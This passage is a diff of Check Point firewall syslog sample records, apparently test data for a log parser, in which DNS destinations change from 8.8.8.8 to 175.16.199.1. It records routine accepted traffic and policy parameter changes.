 <134>1 2020-03-29T17:03:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f0,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"34.98.75.36"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35972"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:03:45Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4f1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:03:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d4f3,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={A355130C-7527-9840-A58E-5280C5686B5B};mgmt=gw-da58d3;date=1585501372;policy_name=Standard\]"; dst:"174.138.9.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35675"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
@@ -2492,81 +2492,81 @@ <134>1 2020-03-29T17:21:22Z gw-da58d3 CheckPoint 8363 - [flags:"393216"; ifdir:"inbound"; loguid:"{0x5e80d913,0x3,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={237AAAA3-CA95-A941-82DA-D980A933F6A5};mgmt=gw-da58d3;date=1585501515;policy_name=InitialPolicy\]"; fw_message:"Parameter 'Connections hash table size' changed from 32768 to 8388608"; product:"VPN-1 & FireWall-1"] <134>1 2020-03-29T17:21:22Z gw-da58d3 CheckPoint 8363 - [flags:"393216"; ifdir:"inbound"; loguid:"{0x5e80d913,0x4,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={237AAAA3-CA95-A941-82DA-D980A933F6A5};mgmt=gw-da58d3;date=1585501515;policy_name=InitialPolicy\]"; fw_message:"Parameter 'Maximum concurrent connections' changed from 25000 to Unlimited"; product:"VPN-1 & FireWall-1"] <134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d913,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80d914,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53590"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35034"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53048"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59937"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; 
logid:"0"; loguid:"{0x5e80d914,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37259"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53590"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35034"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53048"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80d914,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59937"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502484"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37259"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d914,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52092"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"88.221.161.146"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42958"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38366"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50194"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.54.95"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38370"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48771"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34766"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48771"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34766"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52966"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502485"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35133"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d915,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
